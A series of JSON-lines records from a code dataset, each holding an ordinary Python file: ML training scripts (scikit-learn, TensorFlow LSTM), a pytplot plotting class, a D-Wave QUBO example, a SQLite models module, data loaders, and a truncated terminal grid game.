alpha=0.0001, batch_size='auto', beta_1=0.9,\n beta_2=0.999, early_stopping=False, epsilon=1e-08,\n hidden_layer_sizes=(), learning_rate='constant',\n learning_rate_init=0.001, max_iter=200, momentum=0.9,\n nesterovs_momentum=True, power_t=0.5, random_state=None,\n shuffle=True, solver='adam', tol=0.0001, validation_fraction=0.1,\n verbose=False, warm_start=False)\n\nmodel.fit(rx_train, ry_train)\n\nif not os.path.isdir(\"cp_xnn\"):\n os.mkdir(\"cp_xnn\")\nif not os.path.isdir(\"cp_xnn/dat\"):\n os.mkdir(\"cp_xnn/dat\")\n\n\ncpm_filename = \"cp_xnn/MLPClassifier.java\"\nprint(\"preper new trained model {}\".format(cpm_filename))\nif os.path.isfile(cpm_filename):\n os.unlink(cpm_filename)\nporter = Porter(model, language='java')\noutput = porter.export()\nwith open(cpm_filename, 'w+') as file:\n n = file.write(output)\n print(\"traned model saved in c: {} len: {}\".format(cpm_filename, len(output)))\nif not os.path.isfile(cpm_filename):\n print(\"Error: no training model saved\")\n sys.exit(0)\n\n\nprint(\"prepare test dat (for predict)...\")\nfor i in range(0, len(rx_test)):\n test_case = rx_test[i]\n cpd_filename = \"cp_xnn/dat/{}_{:04d}.tdat\".format(len(test_case), i)\n if os.path.isfile(cpd_filename):\n os.unlink(cpd_filename)\n\n with open(cpd_filename, 'w+') as file:\n for j in range(0, len(test_case)):\n if j == len(test_case) - 1:\n file.write(\"{:.3f}\".format(test_case[j]))\n else:\n file.write(\"{:.3f} \".format(test_case[j]))\nprint(\"total {} test prepared in cp_xnn/dat, each has {} features\".format(len(rx_test), len(rx_test[0])))\n\ncpi_filename = \"cp_xnn/cp_info.text\"\nwith open(cpi_filename, 'w+') as file:\n file.write(\"{}\\n\".format(len(rx_test)))\n file.write(\"{}\\n\".format(len(rx_test[0])))\n file.write(\"{}\\n\".format(skip_ratio))\n file.write(\"LinearSVC\\n\")\n\ncpp_filename = \"cp_xnn/pred_result.txt\"\nprint(\"clean up predict file {}\".format(cpp_filename))\nif os.path.isfile(cpp_filename):\n os.unlink(cpp_filename)\n\nprint(\"please go to cp_xnn subfolder, and prepare executable: compile {} to class by javac\".format(cpm_filename))\n","sub_path":"exp_port_1_xnn/xnn_train_all.py","file_name":"xnn_train_all.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"171851575","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/runner/work/PyTplot/PyTplot/pytplot/QtPlotter/TVarFigureAlt.py\n# Compiled at: 2020-04-24 00:12:01\n# Size of source mod 2**32: 13162 bytes\nimport pyqtgraph as pg, numpy as np, pytplot\nfrom CustomLegend.CustomLegend import CustomLegendItem\nimport CustomAxis.AxisItem as AxisItem\nimport CustomViewBox.NoPaddingPlot as NoPaddingPlot\n\nclass TVarFigureAlt(pg.GraphicsLayout):\n\n def __init__(self, tvar_name, show_xaxis=False, mouse_function=None):\n self.tvar_name = tvar_name\n self.show_xaxis = show_xaxis\n self.crosshair = pytplot.tplot_opt_glob['crosshair']\n pg.GraphicsLayout.__init__(self)\n self.layout.setHorizontalSpacing(50)\n self.layout.setContentsMargins(0, 0, 0, 0)\n self.xaxis = pg.AxisItem(orientation='bottom')\n self.xaxis.setHeight(35)\n self.xaxis.enableAutoSIPrefix(enable=False)\n self.yaxis = AxisItem('left')\n self.yaxis.setWidth(100)\n vb = NoPaddingPlot()\n self.plotwindow = self.addPlot(row=0, col=0, axisItems={'bottom':self.xaxis, 'left':self.yaxis}, viewBox=vb)\n self.legendvb = pg.ViewBox(enableMouse=False)\n self.legendvb.setMaximumWidth(100)\n self.legendvb.setXRange(0, 1, padding=0)\n self.legendvb.setYRange(0, 1, padding=0)\n self.addItem(self.legendvb, 0, 1)\n self.curves = []\n self.colors = self._setcolors()\n self.colormap = self._setcolormap()\n if pytplot.tplot_opt_glob['black_background']:\n self.labelStyle = {'font-size':str(pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']['char_size']) + 'pt', \n 'color':'#FFF'}\n else:\n self.labelStyle = {'font-size':str(pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']['char_size']) + 'pt', 'color':'#000'}\n if show_xaxis:\n self.plotwindow.showAxis('bottom')\n else:\n self.plotwindow.hideAxis('bottom')\n self._mouseMovedFunction = mouse_function\n self.vLine = pg.InfiniteLine(angle=90, movable=False, pen=(pg.mkPen('k')))\n self.hLine = pg.InfiniteLine(angle=0, movable=False, pen=(pg.mkPen('k')))\n self.plotwindow.addItem((self.vLine), ignoreBounds=True)\n self.plotwindow.addItem((self.hLine), ignoreBounds=True)\n self.vLine.setVisible(False)\n self.hLine.setVisible(False)\n self.label = pg.LabelItem(justify='left')\n self.addItem((self.label), row=1, col=0)\n self.hoverlegend = CustomLegendItem(offset=(0, 0))\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['xaxis_opt']['crosshair'] + ':', '0')\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['crosshair'] + ':', '0')\n self.hoverlegend.setVisible(False)\n self.hoverlegend.setParentItem(self.plotwindow.vb)\n\n def buildfigure(self):\n self._setxrange()\n self._setyrange()\n self._setyaxistype()\n self._setzaxistype()\n self._setzrange()\n self._visdata()\n self._addtimebars()\n self._setxaxislabel()\n self._setyaxislabel()\n if self.crosshair:\n self._addmouseevents()\n self._addlegend()\n\n def getfig(self):\n return self\n\n def _setxaxislabel(self):\n (self.xaxis.setLabel)(*('Altitude', ), **self.labelStyle)\n\n def _setyaxislabel(self):\n if 'axis_subtitle' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']:\n label = pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['axis_label']\n sublabel = pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['axis_subtitle']\n (self.yaxis.setLabel)(f\"
{label}
{sublabel} <\\\\center>\", **self.labelStyle)\n else:\n (self.yaxis.setLabel)((pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['axis_label']), **self.labelStyle)\n\n def _setyaxistype(self):\n if self._getyaxistype() == 'log':\n self.plotwindow.setLogMode(y=True)\n else:\n self.plotwindow.setLogMode(y=False)\n\n def _getyaxistype(self):\n if 'y_axis_type' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']:\n return pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_axis_type']\n return 'linear'\n\n def _setxrange(self):\n if 'alt_range' in pytplot.tplot_opt_glob:\n self.plotwindow.setXRange(pytplot.tplot_opt_glob['alt_range'][0], pytplot.tplot_opt_glob['alt_range'][1])\n else:\n return\n\n @staticmethod\n def getaxistype():\n axis_type = 'altitude'\n link_y_axis = False\n return (axis_type, link_y_axis)\n\n def _addmouseevents(self):\n if self.plotwindow.scene() is not None:\n self.plotwindow.scene().sigMouseMoved.connect(self._mousemoved)\n\n def _mousemoved(self, evt):\n pos = evt\n if self.plotwindow.sceneBoundingRect().contains(pos):\n mousepoint = self.plotwindow.vb.mapSceneToView(pos)\n index_x = int(mousepoint.x())\n index_y = int(mousepoint.y())\n if self._mouseMovedFunction is not None:\n self._mouseMovedFunction(int(mousepoint.x()))\n self.vLine.setPos(mousepoint.x())\n self.hLine.setPos(mousepoint.y())\n self.vLine.setVisible(True)\n self.hLine.setVisible(True)\n self.hoverlegend.setVisible(True)\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['xaxis_opt']['crosshair'] + ':', index_x)\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['crosshair'] + ':', index_y)\n else:\n self.hoverlegend.setVisible(False)\n self.vLine.setVisible(False)\n self.hLine.setVisible(False)\n\n def _addlegend(self):\n if 'legend_names' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']:\n legend_names = pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['legend_names']\n if len(legend_names) != len(self.curves):\n print('Number of lines do not match length of legend names')\n elif len(legend_names) == 1:\n pos_array = [\n 0.5]\n else:\n pos_array = np.linspace(1, 0, len(legend_names))\n i = 0\n for legend_name in legend_names:\n if i + 1 == len(legend_names):\n text = pg.TextItem(text=legend_name, anchor=(0, 1.5), color=(self.colors[(i % len(self.colors))]))\n else:\n if i == 0:\n text = pg.TextItem(text=legend_name, anchor=(0, -0.5), color=(self.colors[(i % len(self.colors))]))\n else:\n text = pg.TextItem(text=legend_name, anchor=(0, 0.5), color=(self.colors[(i % len(self.colors))]))\n self.legendvb.addItem(text)\n text.setPos(0, pos_array[i])\n i += 1\n\n def _setzaxistype(self):\n if self._getzaxistype() == 'log':\n self.zscale = 'log'\n else:\n self.zscale = 'linear'\n\n def _getzaxistype(self):\n pass\n\n def _setcolors(self):\n if 'line_color' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']:\n return pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']['line_color']\n return pytplot.tplot_utilities.rgb_color(['k', 'r', 'seagreen', 'b', 'darkturquoise', 'm', 'goldenrod'])\n\n def _setcolormap(self):\n pass\n\n def _setyrange(self):\n if self._getyaxistype() == 'log' and not pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][0] <= 0:\n if pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][1] <= 0:\n return\n self.plotwindow.vb.setYRange((np.log10(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][0])), (np.log10(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][1])),\n padding=0)\n else:\n self.plotwindow.vb.setYRange((pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][0]), (pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][1]),\n padding=0)\n\n def _setzrange(self):\n pass\n\n def _addtimebars(self):\n datasets = []\n tbardict = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar']\n ltbar = len(tbardict)\n datasets = [\n pytplot.data_quants[self.tvar_name]]\n for oplot_name in pytplot.data_quants[self.tvar_name].attrs['plot_options']['overplots']:\n datasets.append(pytplot.data_quants[oplot_name])\n\n for dataset in datasets:\n dataset = pytplot.tplot_utilities.convert_tplotxarray_to_pandas_dataframe(dataset.name)\n for i in range(ltbar):\n test_time = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar'][i]['location']\n color = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar'][i]['line_color']\n pointsize = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar'][i]['line_width']\n time = pytplot.data_quants[pytplot.data_quants[self.tvar_name].attrs['plot_options']['links']['alt']].coords['time'].values\n altitude = pytplot.data_quants[pytplot.data_quants[self.tvar_name].attrs['plot_options']['links']['alt']].values\n nearest_time_index = np.abs(time - test_time).argmin()\n data_point = dataset.iloc[nearest_time_index][0]\n alt_point = altitude[nearest_time_index]\n self.plotwindow.scatterPlot([alt_point], [data_point], size=pointsize, pen=(pg.mkPen(None)), brush=color)\n\n def _visdata(self):\n datasets = [\n pytplot.data_quants[self.tvar_name]]\n for oplot_name in pytplot.data_quants[self.tvar_name].attrs['plot_options']['overplots']:\n datasets.append(pytplot.data_quants[oplot_name])\n\n line_num = 0\n for dataset_xr in datasets:\n dataset = pytplot.tplot_utilities.convert_tplotxarray_to_pandas_dataframe(dataset_xr.name)\n coords = pytplot.tplot_utilities.return_interpolated_link_dict(dataset_xr, ['alt'])\n for i in range(0, len(dataset.columns)):\n t_link = coords['alt'].coords['time'].values\n x = coords['alt'].values\n t_tvar = dataset.index.values\n data = dataset[i].values\n while t_tvar[(-1)] > t_link[(-1)]:\n t_tvar = np.delete(t_tvar, -1)\n data = np.delete(data, -1)\n\n while t_tvar[0] < t_link[0]:\n t_tvar = np.delete(t_tvar, 0)\n data = np.delete(data, 0)\n\n self.curves.append(self.plotwindow.scatterPlot((x.tolist()), (data.tolist()), pen=(pg.mkPen(None)),\n brush=(self.colors[(line_num % len(self.colors))])))\n line_num += 1","sub_path":"pycfiles/pytplot-1.6.1.tar/TVarFigureAlt.cpython-37.py","file_name":"TVarFigureAlt.cpython-37.py","file_ext":"py","file_size_in_byte":11532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511770474","text":"from dwave.system import DWaveSampler, EmbeddingComposite, LeapHybridSampler\n\n\n\n# ---------- For Quantum Tests ----------\n# sampler_auto = EmbeddingComposite(DWaveSampler(solver={'qpu': True}))\n\n# ---------- For Hybrid Tests ----------\nsampler_auto = LeapHybridSampler()\n\n# Set Q for the problem QUBO\nlinear = {('E', 'E'): 3}\n# ( 8AB + 8AC + 8AD − 4AE + 8BC + 8BD − 4BE + 8CD − 4CE − 4DE + 3E + 1)\nquadratic = {('A', 'B'): 8, ('A', 'C'): 8, ('A', 'D'): 8, ('A', 'E'): -4, ('B', 'C'): 8,\n ('B', 'D'): 8, ('B', 'E'): -4, ('C', 'D'): 8, ('C', 'E'): -4, ('D', 'E'): -4}\nQ = dict(linear)\nQ.update(quadratic)\n\n\n\n# ---------- For Quantum Tests ----------\n# Minor-embed and sample 1000 times on a default D-Wave system\n\n# sampleset = sampler_auto.sample_qubo(Q, num_reads=1000)\n\n\n# ---------- For Hybrid Tests ----------\nsampleset = sampler_auto.sample_qubo(Q)\n\n\n\n\nprint(sampleset)\n","sub_path":"HBD_Solved_with_QUBO.py","file_name":"HBD_Solved_with_QUBO.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"620048396","text":"## models.py\nfrom banco import bd\n\n\nclass Post:\n def __init__(self, titulo, autor, texto):\n self.titulo = titulo\n self.autor = autor\n self.texto = texto\n\n def gravar(self):\n sql = '''insert into posts (titulo, autor, texto) values (?, ?, ?)'''\n primeiro_interrogacao = self.titulo\n segundo_interrogacao = self.autor\n terceiro_interrogacao = self.texto\n bd().execute(sql, [primeiro_interrogacao, segundo_interrogacao, terceiro_interrogacao])\n bd().commit()\n\n @staticmethod\n def recupera_todos():\n ## Usamos o objeto retornado por bd() para realizar comandos sql\n sql = '''select titulo, autor, texto from posts order by id desc'''\n cur = bd().execute(sql)\n ## Montamos dicionário dicionários com os resultados da consulta para passar para a view\n posts = []\n for titulo, autor, texto in cur.fetchall(): # fetchall() gera uma lista com os resultados:\n post = Post(titulo, autor, texto)\n posts.append(post)\n \n return posts\n\n\nclass Presenca:\n def __init__(self, email, presente, resposta, comentarios):\n self.email = email\n self.presente = presente\n self.resposta = resposta\n self.comentarios = comentarios\n\n def gravar_presenca(self):\n sql = '''insert into presenca (email, presente, resposta, comentarios) values (?, ?, ?, ?)'''\n first_email = self.email\n second_presente = self.presente\n third_resposta = self.resposta\n fourth_comentarios = self.comentarios\n bd().execute(sql, [first_email, second_presente, third_resposta, fourth_comentarios])\n bd().commit()\n\n @staticmethod\n def recupera_presentes():\n ## Usamos o objeto retornado por bd() para realizar comandos sql\n sql = '''select email, presente, resposta, comentarios from presenca order by id desc'''\n cur = bd().execute(sql)\n ## Montamos dicionário dicionários com os resultados da consulta para passar para a view\n presencas = []\n for email, presente, resposta, comentarios in cur.fetchall(): # fetchall() gera uma lista com os resultados:\n presenca = Presenca(email, presente, resposta, comentarios)\n presencas.append(presenca)\n \n return presencas\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"209520699","text":"\"\"\"Human activity recognition using smartphones dataset and an LSTM RNN.\"\"\"\n\n# https://github.com/guillaume-chevalier/LSTM-Human-Activity-Recognition\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Guillaume Chevalier\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n# Also thanks to Zhao Yu for converting the \".ipynb\" notebook to this \".py\"\n# file which I continued to maintain.\n\n# Note that the dataset must be already downloaded for this script to work.\n# To download the dataset, do:\n# $ cd data/\n# $ python download_dataset.py\n\n\nimport tensorflow as tf\nimport numpy as np\n\n###################################################################\n# 载入数据,神经网络的训练集的和测试集的输入\ndef loadData(X_signals_paths):\n X_signals = []\n\n # 遍历读取文件\n for signal_type_path in X_signals_paths:\n file = open(signal_type_path, 'r')\n # 读取数据集,并进行文本处理\n X_signals.append(\n [np.array(serie, dtype=np.float32) for serie in [\n # 文件每一行进行处理\n row.replace(' ', ' ').strip().split(' ') for row in file]]\n )\n # X_signals大小为 9*7352*128,9个特征文件,7352个样本,128个时间点\n file.close()\n\n # 转换维度,(9*7352*128) -> (7352, 128, 9)\n return np.transpose(np.array(X_signals), (1, 2, 0))\n\n###################################################################\n# 载入数据集y,神经网络的训练集的和测试集的输出\ndef loadY(y_path):\n file = open(y_path, 'r')\n # 读取数据集,并进行文本处理\n y_ = np.array(\n [val for val in [\n row.replace(' ', ' ').strip().split(' ') for row in file\n ]],\n dtype=np.int32\n )\n file.close()\n # 将每个输出减去1,以获得基于0的索引\n return y_ - 1\n\n###################################################################\n# 将输出类转换为哑变量编码形式,\n# 如[[5], [0], [3]] -> [[0,0,0,0,0,1], [1,0,0,0,0,0], [0,0,0,1,0,0]]\ndef oneHot(y_):\n # (7352, 1) -> (7352,)\n y_ = y_.reshape(len(y_))\n # 7 = 6 + 1\n n_values = int(np.max(y_)) + 1\n # np.eye为对角矩阵,然后将[np.array(y_, dtype=np.int32)]当做索引\n # 选择np.eye对应的值\n return np.eye(n_values)[np.array(y_, dtype=np.int32)]\n\n###################################################################\n# 模型参数\nclass Config(object):\n '''\n 定义类用于存储参数,输入应该是训练集和测试集的特征\n 注: 使用HyperOpt搜索空间会更有趣,地址:\n https://github.com/hyperopt/hyperopt\n '''\n def __init__(self, X_train, X_test):\n # 输入数据\n # 训练集样本数, 7352\n self.train_cnt = len(X_train)\n # 测试集样本数, 2947\n self.test_cnt = len(X_test)\n # 时间步长, 128\n self.n_steps = len(X_train[0])\n\n # 训练参数\n # 学习速率\n self.learning_rate = 0.0025\n self.lambda_loss_amount = 0.0015\n # 迭代次数\n self.training_epochs = 300\n # 批处理数据量\n self.batch_size = 1500\n\n # LSTM结构\n # 特征有9个,3 * 3D的传感器特征\n self.n_inputs = len(X_train[0][0])\n # 神经网络的隐藏层单元数\n self.n_hidden = 32\n # 最后输出类\n self.n_classes = 6\n # 权重\n self.W = {\n 'hidden': tf.Variable(tf.random_normal([self.n_inputs, self.n_hidden])),\n 'output': tf.Variable(tf.random_normal([self.n_hidden, self.n_classes]))\n }\n # 偏差\n self.biases = {\n 'hidden': tf.Variable(tf.random_normal([self.n_hidden], mean=1.0)),\n 'output': tf.Variable(tf.random_normal([self.n_classes]))\n }\n\n###################################################################\n# lstm网络结构\ndef lstmNetwork(X, config):\n '''\n 使用两层堆叠的lstm单元的rnn,两个lstm单元堆叠在一起,增加了神经网络的深度。\n\n 参数:\n X: 数组特征矩阵,维度: [batch_size, time_steps, n_inputs]\n config: 神经网络的配置参数\n '''\n\n # 注意: This step could be greatly optimised by shaping the dataset once\n # 输入维度: (batch_size, n_steps, n_input)\n # 交换n_steps和batch_size的位置\n # (batch_size, n_steps, n_input) -> (n_steps, batch_size, n_input)\n X = tf.transpose(X, [1, 0, 2])\n # 重塑维度,作为隐藏层激活的输入\n # (n_steps, batch_size, n_input) -> (n_steps*batch_size, n_input)\n X = tf.reshape(X, [-1, config.n_inputs])\n\n # relu激活函数\n X = tf.nn.relu(tf.matmul(X, config.W['hidden']) + config.biases['hidden'])\n # 切分数据集,因为rnn神经元需要rnn内部循环的输入列表\n # (n_steps*batch_size, n_input) -> n_steps * (batch_size, n_hidden)\n X = tf.split(X, config.n_steps, 0)\n\n # 定义两层堆叠的lstm单元(两层循环神经元)\n # forget_bias=1, 不会忘记任何信息;等于0,全部忘记\n # state_is_tuple: 返回的状态用一个元祖表\n lstm_cell_1 = tf.contrib.rnn.BasicLSTMCell(config.n_hidden, forget_bias=1.0, state_is_tuple=True)\n lstm_cell_2 = tf.contrib.rnn.BasicLSTMCell(config.n_hidden, forget_bias=1.0, state_is_tuple=True)\n # 堆叠两层lstm\n lstm_cells = tf.contrib.rnn.MultiRNNCell([lstm_cell_1, lstm_cell_2], state_is_tuple=True)\n # lstm单元的输出,使用静态rnn\n outputs, states = tf.contrib.rnn.static_rnn(lstm_cells, X, dtype=tf.float32)\n\n # 对于一个多对一的分类器,取最后时刻的输出特征\n # 如本业顶部rnn的描述图片\n lstm_last_output = outputs[-1]\n\n # 线性激活函数\n return tf.matmul(lstm_last_output, config.W['output']) + config.biases['output']\n\n\n###################################################################\n# 主程序\nif __name__ == '__main__':\n\n # -----------------------------\n # Step 1: 载入数据\n # -----------------------------\n\n # 这些是神经网络的单独的标准化输入特征\n input_signal_types = [\n 'body_acc_x_',\n 'body_acc_y_',\n 'body_acc_z_',\n 'body_gyro_x_',\n 'body_gyro_y_',\n 'body_gyro_z_',\n 'total_acc_x_',\n 'total_acc_y_',\n 'total_acc_z_'\n ]\n\n # 输出类来学习如何分类\n labels = [\n 'WALKING',\n 'WALKING_UPSTAIRS',\n 'WALKING_DOWNSTAIRS',\n 'SITTING',\n 'STANDING',\n 'LAYING'\n ]\n\n # 数据路径\n data_path = 'raw_data/'\n dataset_path = data_path + 'UCI HAR Dataset/'\n\n train = 'train/'\n test = 'test/'\n\n # 读取训练集\n X_train_signals_paths = [\n dataset_path + train + 'Inertial Signals/' + signal + 'train.txt' for signal in input_signal_types\n ]\n # 读取测试集\n X_test_signals_paths = [\n dataset_path + test + 'Inertial Signals/' + signal + 'test.txt' for signal in input_signal_types\n ]\n\n # 载入数据集\n X_train = loadData(X_train_signals_paths)\n X_test = loadData(X_test_signals_paths)\n\n # 输出类的路径\n y_train_path = dataset_path + train + 'y_train.txt'\n y_test_path = dataset_path + test + 'y_test.txt'\n # 将输出类转为哑变量形式\n y_train = oneHot(loadY(y_train_path))\n y_test = oneHot(loadY(y_test_path))\n\n # -----------------------------------\n # Step 2: 定义模型参数\n # -----------------------------------\n config = Config(X_train, X_test)\n print(\"Some useful info to get an insight on dataset's shape and normalisation:\")\n print('features shape, labels shape, each features mean, each features standard deviation')\n print(X_test.shape, y_test.shape, np.mean(X_test), np.std(X_test))\n print('the dataset is therefore properly normalised, as expected.')\n\n # ------------------------------------------------------\n # Step 3: 建立神经网络\n # ------------------------------------------------------\n\n # 定义形参\n X = tf.placeholder(tf.float32, [None, config.n_steps, config.n_inputs])\n y = tf.placeholder(tf.float32, [None, config.n_classes])\n\n # 预测值y\n pred_y = lstmNetwork(X, config)\n\n # 对每个变量加上l2范数, trainable_variables: 返回的是需要训练的变量列表\n l2 = config.lambda_loss_amount * \\\n sum(tf.nn.l2_loss(tf_var) for tf_var in tf.trainable_variables())\n # 损失函数 + L2\n cost = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=pred_y)) + l2\n # 优化方法\n optimizer = tf.train.AdamOptimizer(\n learning_rate=config.learning_rate).minimize(cost)\n # 准确率\n correct_pred = tf.equal(tf.argmax(pred_y, 1), tf.argmax(y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, dtype=tf.float32))\n\n # --------------------------------------------\n # Step 4: 训练网络\n # --------------------------------------------\n\n # 注意,log_device_placement可以打开,但会导致console多出很多信息\n # tf.InteractiveSession: 加载它自身作为默认构建的session\n sess = tf.InteractiveSession(config=tf.ConfigProto(log_device_placement=False))\n init = tf.global_variables_initializer()\n sess.run(init)\n\n # 初始最佳准确率\n best_accuracy = 0.0\n # 开始每个batch和loop epochs的训练\n for i in range(config.training_epochs):\n for start, end in zip(range(0, config.train_cnt, config.batch_size),\n range(config.batch_size, config.train_cnt + 1, config.batch_size)):\n sess.run(optimizer, feed_dict={X: X_train[start: end],\n y: y_train[start: end]})\n\n # 每迭代一次进行测试,计算准确率\n pred_out, accuracy_out, loss_out = sess.run(\n [pred_y, accuracy, cost], feed_dict={X: X_test, y: y_test})\n\n print('train iter: {},'.format(i) +\n ' test accuracy: {},'.format(accuracy_out) +\n ' loss: {}'.format(loss_out))\n best_accuracy = max(best_accuracy, accuracy_out)\n\n print('')\n print('final test accuracy: {}'.format(accuracy_out))\n print(\"best epoch's test accuracy: {}\".format(best_accuracy))\n print('')\n\n","sub_path":"lstm_for_human_activity_recognition/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":11283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"152052012","text":"import csv\nimport random\n\n\ndef get_data(filename, location, sensor):\n data = []\n first = True\n\n file = open(filename, \"r\")\n csv_reader = csv.reader(file, delimiter=\",\")\n for row in csv_reader:\n if row[0] == location:\n if first:\n data.append({'id': int(0), 'value': float(row[sensor])})\n first_value = int(row[1])\n first = False\n else:\n data.append({'id': (int(row[1]) - first_value) / 1000, 'value': float(row[sensor])})\n file.close()\n\n return data\n\n\ndef randomly(seq):\n shuffled = list(seq)\n random.shuffle(shuffled)\n return iter(shuffled)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"514211764","text":"\"\"\"Create the input data pipeline using `tf.data`\"\"\"\n\nimport tensorflow as tf\n\n\ndef _parse_function(image, label, size):\n \"\"\"Reshape the image and convert to float value (for both training and validation).\n\n The following operations are applied:\n - Reshape to [None, size, size, 1]\n - Convert to float\n \"\"\"\n # This will convert to float values in [0, 1]\n image = tf.image.convert_image_dtype(image, tf.float32)\n\n resized_image = tf.reshape(image, [size, size, 1])\n\n return resized_image, label\n\n\ndef input_fn(is_training, images, labels, params):\n \"\"\"Input function for the FASHION-MNIST dataset.\n\n Args:\n is_training: (bool) whether to use the train or test pipeline.\n At training, we shuffle the data and have multiple epochs\n images: (np.array) images as a big numpy array\n labels: (np.array) corresponding labels\n params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n \"\"\"\n num_samples = len(images)\n assert len(images) == len(labels), \"Images and labels should have same length\"\n\n # Create a Dataset serving batches of images and labels\n # We don't repeat for multiple epochs because we always train and evaluate for one epoch\n parse_fn = lambda img, l: _parse_function(img, l, params.image_size)\n\n if is_training:\n dataset = (tf.data.Dataset.from_tensor_slices((images, labels))\n .shuffle(num_samples) # whole dataset into the buffer ensures good shuffling\n .repeat(params.num_epochs) # repeat for multiple epochs\n .map(parse_fn, num_parallel_calls=params.num_parallel_calls)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n else:\n dataset = (tf.data.Dataset.from_tensor_slices((images, labels))\n .map(parse_fn, num_parallel_calls=params.num_parallel_calls)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n\n # Return the dataset for tf.estimator (TensorFlow version >= 1.6)\n return dataset\n","sub_path":"model/input_fn.py","file_name":"input_fn.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"107888447","text":"from getch import getch\nimport colors\nimport random\nimport time\n\nsize = 4\n\n\n\n# stuff for printing\ndot = '◉'\nblack = colors.rgb(0,0,0)\nwhite = colors.rgb(255,255,255)\ncyan = colors.cyan\nred = colors.red\nmagenta = colors.rgb(250,0,250)\nyellow = colors.yellow\nfrog = '☻'\nblock = '◯'\nblock = '☗'\nblock = '█'\n\nprint(colors.hide_cursor)\n\ndef make_grid(n):\n return [[0]*n for i in range(n)]\n\ngrid = make_grid(size)\n\n\nfor i in range(size):\n for j in range(size):\n grid[i][j] = i*size + j\n\ndef move_guy(grid, way):\n n = len(grid)\n for i in range(n):\n for j in range(n):\n if grid[i][j] == 1:\n if way == 'up' and grid[(i-1)%n][j] == 0 :\n grid[i][j], grid[(i-1)%n][j] = 0,1\n return\n if way == 'down' and grid[(i+1)%n][j] == 0 : \n grid[i][j], grid[(i+1)%n][j] = 0,1\n return\n if way == 'left' and grid[i][(j-1)%n] == 0 :\n grid[i][j], grid[i][(j-1)%n] = 0,1\n return\n if way == 'right' and grid[i][(j+1)%n] == 0 :\n grid[i][j], grid[i][(j+1)%n] = 0,1\n return\n\ndef mobius_shift(grid, way):\n _new_ = make_grid(size)\n if way == 'right':\n for i in range(size):\n for j in range(size):\n _new_[i][j] 